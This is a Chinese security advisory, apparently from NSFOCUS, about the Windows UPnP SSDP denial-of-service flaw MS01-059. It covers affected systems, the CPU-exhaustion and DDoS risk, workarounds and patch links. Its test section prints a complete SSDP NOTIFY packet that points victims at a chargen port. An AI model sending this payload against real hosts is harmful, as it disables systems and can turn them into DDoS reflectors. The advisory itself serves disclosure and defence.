首页 -> 安全研究
安全研究
安全漏洞
Microsoft UPnP简单服务发现协议拒绝服务漏洞(MS01-059)
发布日期:2001-12-20
更新日期:2001-12-24
受影响系统:
Microsoft UPnP Service描述:
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows XP
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
BUGTRAQ ID: 3724
CVE(CAN) ID: CVE-2001-0877
UPnP(Universal Plug and Play)是一种允许主机定位和使用局域网上设备的服务。UPnP在Windows XP和ME中被支持。简单服务发现协议(Simple Service Discovery Protocol)是UPnP服务的一个组件,它可以使一个系统枚举出UPnP网络上新安装设备上的可用资源。
SSDP服务实现上存在漏洞,可以使远程攻击者对其实施拒绝服务攻击。
通过向运行了UPnP服务的系统的1900端口发送一个UDP包,其中“LOCATION”域的地址指向另一个系统的chargen端口,可能使系统会进入一个无限的连接循环。这可能导致系统CPU占用100%,无法提供正常服务。
另外,攻击者也可以利用这个漏洞来发起DDoS攻击,只要向某个存在大量XP主机的网络中发送一个伪造的UDP报文,就可能强迫这些XP主机对指定主机进行攻击。
<*来源:Riley Hassell (riley@eeye.com)
Eeye Digital Security
链接:http://archives.neohapsis.com/archives/bugtraq/2001-12/0216.html
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp
http://www.eeye.com/html/Research/Advisories/AD20011220.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
如果向目标主机发送下列会话:
NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1
LOCATION: http://xptest.example.com:19/himom.html
NT: urn: schemas-upnp-org:device:InternetGatewayDevice:1
NTS: ssdp:alive
SERVER: EEYE/2001 UPnP/1.0 PASSITON/1.1
USN: uuid:EEYE
目标主机会根据“LOCATION”域中的URL来发起连接,如果该URL中的主机启动了chargen服务,那么目标主机就会不断的进行分配和释放内存,从而大量占用系统CPU资源,使系统不可用。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在漏洞被修补之前,暂时关闭UPnP服务
* 在网络边界的防火墙或者路由设备上限制对1900和5000端口的访问。这可以防止来自外部网络的攻击,但是不能防止内部网络用户发起攻击。
厂商补丁:
Microsoft
---------
微软已经为此发布了一个安全公告(MS01-059)以及相应补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp
补丁下载:
. Microsoft Windows 98/98SE:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=34991
. Microsoft Windows ME:
http://download.microsoft.com/download/winme/Update/22940/WinMe/EN-US/314757USAM.EXE
. Microsoft Windows XP:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=34951
浏览次数:3929
严重程度:0(网友投票)
绿盟科技给您安全的保障